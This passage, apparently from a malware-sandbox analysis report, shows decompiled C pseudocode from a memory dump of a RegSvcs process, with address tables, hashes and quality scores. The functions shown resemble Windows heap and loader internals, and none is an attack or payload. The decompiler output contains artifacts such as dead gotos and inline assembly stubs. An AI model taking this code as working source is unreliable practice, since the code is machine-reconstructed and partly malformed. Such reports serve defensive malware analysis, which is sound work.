				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E00FD2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E010888F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E00FFAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x10ab1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x10a84c0;
										if(_t69 >=  *0x10a84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01089063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00FB922A(_t82);
							_t53 = E00FD7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01088B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x10a86c0; // 0xb507b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x10a86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x10a86bc;
										_t72 = 0x10a86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00FB9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x10a86c4;
									_t72 = 0x10a86c0;
									L18:
									E00FE9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x00fb9100
0x00fb9100
0x00fb9100
0x00fb9100
0x00fb9102
0x00fb9107
0x00fb910c
0x00fb9110
0x00fb9115
0x00fb9136
0x00fb9143
0x010137e4
0x010137e4
0x00fb9149
0x00fb914e
0x00fb914e
0x00fb9117
0x00fb911d
0x00000000
0x00000000
0x00fb911f
0x00fb9125
0x00000000
0x00fb9151
0x00fb9158
0x00fb915d
0x00fb9161
0x00fb9168
0x01013715
0x00000000
0x00fb916e
0x00fb916e
0x00fb9175
0x00fb9177
0x00fb917e
0x00fb917f
0x00fb9182
0x00fb9182
0x00fb9187
0x00fb9187
0x00fb918a
0x00fb918d
0x00fb918f
0x00fb9192
0x00fb9195
0x00fb9198
0x00fb9198
0x00fb9198
0x00fb919a
0x00000000
0x00000000
0x0101371f
0x01013721
0x01013727
0x0101372f
0x01013733
0x01013735
0x01013738
0x0101373b
0x0101373d
0x01013740
0x00000000
0x00000000
0x01013746
0x01013749
0x00000000
0x00000000
0x0101374f
0x01013751
0x00000000
0x00000000
0x01013757
0x01013759
0x0101375c
0x0101375c
0x0101375e
0x0101375e
0x01013761
0x01013764
0x00000000
0x00000000
0x01013766
0x01013768
0x010137a3
0x010137a3
0x010137a5
0x010137a7
0x010137ad
0x010137b0
0x010137b2
0x010137bc
0x010137c2
0x010137c2
0x010137b2
0x00fb9187
0x00fb9187
0x00fb918a
0x00fb918d
0x00fb918f
0x00fb9192
0x00fb9195
0x00000000
0x00fb9195
0x00000000
0x00fb9187
0x0101376a
0x0101376a
0x0101376c
0x0101376c
0x0101376f
0x01013775
0x00000000
0x00000000
0x01013777
0x01013779
0x00000000
0x00000000
0x01013782
0x01013787
0x01013789
0x01013790
0x01013790
0x0101378b
0x0101378b
0x0101378b
0x01013792
0x01013795
0x01013795
0x01013798
0x01013798
0x0101379b
0x0101379b
0x00fb91a3
0x00fb91a9
0x00fb91b0
0x00fb91b4
0x00fb91b4
0x00fb91bb
0x00fb91c0
0x00fb91c5
0x00fb91c7
0x010137da
0x00fb91cd
0x00fb91cd
0x00fb91cd
0x00fb91d2
0x00fb91d5
0x00fb9239
0x00fb9239
0x00fb91d7
0x00fb91db
0x00fb91e1
0x00fb91e7
0x00fb91fd
0x00fb9203
0x00fb921e
0x00fb9223
0x00000000
0x00fb9223
0x00fb9205
0x00fb9208
0x00fb920c
0x00fb9214
0x00fb9214
0x00fb91e9
0x00fb91e9
0x00fb91ee
0x00fb91f3
0x00fb91f3
0x00fb91f3
0x00fb91e7
0x00000000
0x00fb91db
0x00fb9187
0x00fb9168

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20906938a57ca91e8aff73fa63eff24bbb698451244eb06df0b7d0c4487c4c9
Instruction ID: eb89fa648ebfbb7e5ddb335121ac642104c6560a196a0e4819b92851366a668a
Opcode Fuzzy Hash: b20906938a57ca91e8aff73fa63eff24bbb698451244eb06df0b7d0c4487c4c9
Instruction Fuzzy Hash: 5C31E575E08246DFDB21DF6DC4887DCBBF1BB48320F28814AD54467241C3B4A980EF51

Uniqueness

Uniqueness Score: -1.00%

Function 00FE1DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00FE1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E00FDF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L00FD4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E00FDF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x00fe1dc2
0x00fe1dc5
0x00fe1dc7
0x00fe1dcc
0x00fe1dce
0x00fe1dd6
0x00fe1ddf
0x00fe1de0
0x00fe1de1
0x00fe1de5
0x00fe1de8
0x00fe1def
0x00fe1df0
0x00fe1df6
0x00fe1df7
0x00fe1dfe
0x00fe1e1a
0x00000000
0x00000000
0x00fe1e0b
0x00fe1e12
0x00fe1e12
0x00fe1e00
0x00fe1e00
0x00fe1e05
0x00fe1e1e
0x00fe1e23
0x0102570f
0x01025713
0x00000000
0x00000000
0x01025719
0x01025719
0x00fe1e2c
0x00fe1e2d
0x00fe1e2e
0x00fe1e2f
0x00fe1e31
0x00fe1e32
0x00fe1e35
0x00fe1e3d
0x01025723
0x0102573d
0x0102573d
0x00000000
0x01025723
0x00fe1e49
0x00fe1e4e
0x00fe1e4e
0x00fe1e09
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 5a4508a1bfc1838d43a379f7a724984d039c11606e738ef72162005b00510272
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 41217F72A00259EBD721CF9ACC80FABBBBAFF85750F154055F90597250D634AE01E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FEF527 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00FEF527(void* __ecx, void* __edx, signed int* _a4) {
				char _v8;
				signed int _v12;
				void* __ebx;
				signed int _t28;
				signed int _t32;
				signed int _t34;
				signed char* _t37;
				intOrPtr _t38;
				intOrPtr* _t50;
				signed int _t53;
				void* _t69;

				_push(__ecx);
				_push(__ecx);
				_t69 = __ecx;
				_t53 =  *(__ecx + 0x10);
				_t50 = __ecx + 0x14;
				_t28 = _t53 + __edx;
				_v12 = _t28;
				if(_t28 >  *_t50) {
					_v8 = _t28 -  *_t50;
					_push(E00FE0678( *((intOrPtr*)(__ecx + 0xc)), 1));
					_push(0x1000);
					_push( &_v8);
					_push(0);
					_push(_t50);
					_push(0xffffffff);
					_t32 = E00FF9660();
					__eflags = _t32;
					if(_t32 < 0) {
						 *_a4 =  *_a4 & 0x00000000;
						L2:
						return _t32;
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1e8)) =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0xc)) + 0x1e8)) + _v8;
					_t34 = E00FD7D50();
					_t66 = 0x7ffe0380;
					__eflags = _t34;
					if(_t34 != 0) {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					} else {
						_t37 = 0x7ffe0380;
					}
					__eflags =  *_t37;
					if( *_t37 != 0) {
						_t38 =  *[fs:0x30];
						__eflags =  *(_t38 + 0x240) & 0x00000001;
						if(( *(_t38 + 0x240) & 0x00000001) == 0) {
							goto L7;
						}
						__eflags = E00FD7D50();
						if(__eflags != 0) {
							_t66 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01071582(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, __eflags, _v8,  *( *((intOrPtr*)(_t69 + 0xc)) + 0x74) << 3,  *_t66 & 0x000000ff);
						E0107138A(_t50,  *((intOrPtr*)(_t69 + 0xc)),  *_t50, _v8, 9);
						goto L7;
					} else {
						L7:
						 *_t50 =  *_t50 + _v8;
						_t53 =  *(_t69 + 0x10);
						goto L1;
					}
				}
				L1:
				 *_a4 = _t53;
				 *(_t69 + 0x10) = _v12;
				_t32 = 0;
				goto L2;
			}

0x00fef52c
0x00fef52d
0x00fef530
0x00fef533
0x00fef536
0x00fef539
0x00fef53c
0x00fef541
0x00fef561
0x00fef569
0x00fef56a
0x00fef572
0x00fef573
0x00fef575
0x00fef576
0x00fef578
0x00fef57d
0x00fef57f
0x00fef5b7
0x00fef550
0x00fef556
0x00fef556
0x00fef587
0x00fef58d
0x00fef592
0x00fef597
0x00fef599
0x0102bcc9
0x00fef59f
0x00fef59f
0x00fef59f
0x00fef5a1
0x00fef5a4
0x0102bcd3
0x0102bcd9
0x0102bce0
0x00000000
0x00000000
0x0102bceb
0x0102bced
0x0102bcf8
0x0102bcf8
0x0102bcf8
0x0102bd11
0x0102bd20
0x00000000
0x00fef5aa
0x00fef5aa
0x00fef5ad
0x00fef5af
0x00000000
0x00fef5af
0x00fef5a4
0x00fef543
0x00fef546
0x00fef54b
0x00fef54e
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1964674c32ee0b8d0769a9c26bb8bd53e50b50cf439c01f9c98bc06a8389b4f
Instruction ID: 7aa31e193bf5789e91ed54556732b58f9b9074eacb958d9c47bc8a2b1eeebb7d
Opcode Fuzzy Hash: a1964674c32ee0b8d0769a9c26bb8bd53e50b50cf439c01f9c98bc06a8389b4f
Instruction Fuzzy Hash: BA316931600688EFD721CF69C880F6AB7F9EF44350F2845A9E9558B691EB70EE01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FD8D76 Relevance: .1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00FD8D76(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				signed int _t24;
				intOrPtr* _t26;
				char* _t27;
				intOrPtr* _t32;
				char* _t33;
				signed char _t43;
				signed char _t44;
				signed char _t52;
				void* _t56;
				intOrPtr* _t57;

				_t56 = __edx;
				_t57 = __ecx;
				if(( *(__edx + 0x10) & 0x0000ffff) == 0) {
					L14:
					_t52 = 0;
				} else {
					_t52 = 1;
					if(( *0x10a84b4 & 0x00000004) == 0) {
						_t24 =  *(__ecx + 0x5c) & 0x0000ffff;
						if(_t24 > 0x70 ||  *((intOrPtr*)(__ecx + 0x50)) < ( *(0xf9ade8 + _t24 * 2) & 0x0000ffff) << 4) {
							goto L2;
						} else {
							asm("sbb bl, bl");
							_t44 = _t43 & 1;
							goto L3;
						}
						goto L10;
					} else {
						L2:
						_t44 = 0;
					}
					L3:
					_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t26 != 0) {
						if( *_t26 == 0) {
							goto L4;
						} else {
							_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							goto L5;
						}
						L23:
					} else {
						L4:
						_t27 = 0x7ffe038a;
					}
					L5:
					if( *_t27 != 0) {
						L21:
						if(_t44 != 0) {
							E01071751(_t44,  *((intOrPtr*)( *((intOrPtr*)( *_t57 + 0xc)) + 0xc)),  *((intOrPtr*)(_t56 + 4)),  *(_t57 + 0x5c) & 0x0000ffff);
							_t52 = 1;
							goto L9;
						}
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
						if(_t32 != 0) {
							if( *_t32 == 0) {
								goto L7;
							} else {
								_t33 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								goto L8;
							}
							goto L23;
						} else {
							L7:
							_t33 = 0x7ffe0380;
						}
						L8:
						if( *_t33 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
								goto L9;
							} else {
								goto L21;
							}
						} else {
							L9:
							if(_t44 != 0) {
								goto L14;
							}
						}
					}
				}
				L10:
				return _t52;
				goto L23;
			}

0x00fd8d7b
0x00fd8d7d
0x00fd8d89
0x00fd8e01
0x00fd8e01
0x00fd8d8b
0x00fd8d8d
0x00fd8d95
0x00fd8de1
0x00fd8de8
0x00000000
0x00fd8dfc
0x01020592
0x01020594
0x00000000
0x01020594
0x00000000
0x00fd8d97
0x00fd8d97
0x00fd8d97
0x00fd8d97
0x00fd8d99
0x00fd8d9f
0x00fd8da4
0x0102059e
0x00000000
0x010205a4
0x010205ad
0x00000000
0x010205ad
0x00000000
0x00fd8daa
0x00fd8daa
0x00fd8daa
0x00fd8daa
0x00fd8daf
0x00fd8db2
0x010205e6
0x010205e8
0x010205fe
0x01020605
0x00000000
0x01020605
0x00fd8db8
0x00fd8dbe
0x00fd8dc3
0x010205ba
0x00000000
0x010205c0
0x010205c9
0x00000000
0x010205c9
0x00000000
0x00fd8dc9
0x00fd8dc9
0x00fd8dc9
0x00fd8dc9
0x00fd8dce
0x00fd8dd1
0x010205e0
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd8dd7
0x00fd8dd7
0x00fd8dd9
0x00000000
0x00000000
0x00fd8dd9
0x00fd8dd1
0x00fd8db2
0x00fd8ddd
0x00fd8de0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db149edd4660c1484b2ae1c6e23404d58080456a2f153bf165f6d9709c1ae122
Instruction ID: a5e4b6e2bcd7a7ac6f9c959785a63070e80efbc47eed2dfdc41d66d561d8478b
Opcode Fuzzy Hash: db149edd4660c1484b2ae1c6e23404d58080456a2f153bf165f6d9709c1ae122
Instruction Fuzzy Hash: 5221DD79201A90CFD3668B2CC094B7673E6FB51794F1C4497E8828B7D5CB39DC82E620

Uniqueness

Uniqueness Score: -1.00%

Function 01036C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01036C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E00FD7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x10a7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L00FD4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E00FFF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E00FD7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E00FF9AE0();
						_t23 = L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01036c0a
0x01036c0f
0x01036c10
0x01036c13
0x01036c15
0x01036c19
0x01036c1c
0x01036c21
0x01036c28
0x01036c3a
0x01036c2a
0x01036c33
0x01036c33
0x01036c3f
0x01036c48
0x01036c4d
0x01036c60
0x01036c65
0x01036c69
0x01036c73
0x01036c79
0x01036c7f
0x01036c86
0x01036c90
0x01036c94
0x01036ca6
0x01036cb2
0x01036cbd
0x01036cbd
0x01036cc3
0x01036cc7
0x01036ccb
0x01036cd0
0x01036cd1
0x01036ce2
0x01036ce2
0x01036c69
0x01036ced

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e9ddc0dad0060c5f8b3fd3ef9e14df87e6d5964c0fa5d5ac6c43b62a0291e1
Instruction ID: 733180b2cd5de5fb281e1097c8db70b10a82bca11a3c9474b05593501a42fc27
Opcode Fuzzy Hash: 20e9ddc0dad0060c5f8b3fd3ef9e14df87e6d5964c0fa5d5ac6c43b62a0291e1
Instruction Fuzzy Hash: B321AD71A10648BFD711DB68D880F2AB7B8FF48700F1440AAFA45CB791E639ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00FF90AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00FF90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0100D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E00FEE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L00FD4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E00FFF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E00FEA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x00ff90af
0x00ff90b8
0x00ff90bb
0x00ff90bf
0x00ff90c2
0x00ff90c2
0x00ff90c8
0x00ff90cb
0x00ff90cd
0x010314d7
0x010314eb
0x010314eb
0x00000000
0x010314eb
0x010314db
0x010314e6
0x00000000
0x010314f2
0x010314e8
0x00000000
0x010314e8
0x00ff90d8
0x00ff90da
0x00ff90dd
0x00ff90e5
0x00000000
0x00ff9139
0x00ff90fa
0x00ff90fe
0x00ff9142
0x00000000
0x00ff9142
0x00ff9104
0x00ff9107
0x00ff910b
0x00ff9110
0x00ff9118
0x00ff9147
0x00ff9148
0x00ff914f
0x00ff9150
0x00ff9151
0x00ff9152
0x00ff9156
0x00ff915d
0x00ff9160
0x00ff9168
0x00ff916c
0x00ff91bc
0x00ff91be
0x00000000
0x00ff91be
0x00ff916e
0x00ff9173
0x00ff9176
0x00000000
0x00000000
0x00ff917c
0x00ff9180
0x00ff91b5
0x00000000
0x00ff91b5
0x00ff9182
0x00ff9185
0x00ff9189
0x00000000
0x00000000
0x00ff918e
0x00ff9190
0x00ff9198
0x00000000
0x00000000
0x00ff91a0
0x00000000
0x00ff91ad
0x00ff91ad
0x00ff91b0
0x00ff91b1
0x00000000
0x00ff9185
0x00ff911a
0x00ff911c
0x00ff911f
0x00ff9125
0x00ff9127
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 1a8a133c996b887fd3834119335e814c024932d2c812186a2dae6d0c2ee29841
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 43217171A00209EFDB21DF59C844FAAF7F8EF44310F14847AEA85A7251D670ED049B50

Uniqueness

Uniqueness Score: -1.00%

Function 00FE3B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00FE3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x10a84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x10a84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x10a84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E00FFAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E00FFFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x10a84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x10a84c4; // 0x0
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x00fe3b89
0x00fe3b96
0x00fe3ba1
